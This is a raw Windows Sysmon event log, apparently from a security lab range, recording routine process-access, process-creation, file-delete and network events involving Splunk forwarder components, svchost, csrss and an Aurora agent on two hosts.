Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044092Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.940{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044091Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.940{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044090Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.939{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044089Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.939{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.939{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E4C0-63C7-5106-00000000AF02}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.939{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E4C0-63C7-5106-00000000AF02}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.938{FE4C2B44-E4C0-63C7-5106-00000000AF02}3208C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:28.667{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3BA041D26A77C91DD0316B646C8317,SHA256=A77B3C8704D84B5DCE699A1DCD71E4FE4451E58AFB70AC81FBD4E845AFA25173,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016853Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:28.715{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C23459C5B0EF0BA2E753FEE5DF6BFE6E,SHA256=C9B0DBA21B7D09F16E69E172622E117A9BC0DBCD27E16E756F076E2FB0473D4F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016883Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.950{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016882Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.950{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000016881Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.950{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 23542300x800000000000000016880Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.816{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=379D489596709A57D0509CEF5172DDE2,SHA256=763FDC6D756940F01A19C5157C629FF03007B4C0CF341933A5C4A8B5912C4642,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016879Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016878Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016877Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016876Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016875Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016874Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016873Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016872Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016871Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016870Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016869Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016868Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.800{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016867Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:23:29.801{E5A8D418-E4C1-63C7-0B02-00000000B002}3500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044106Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:27.080{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56375-false10.0.1.12-8089- 10341000x800000000000000044105Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:23:29.799{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E4C1-63C7-5206-00000000AF02}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044104Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 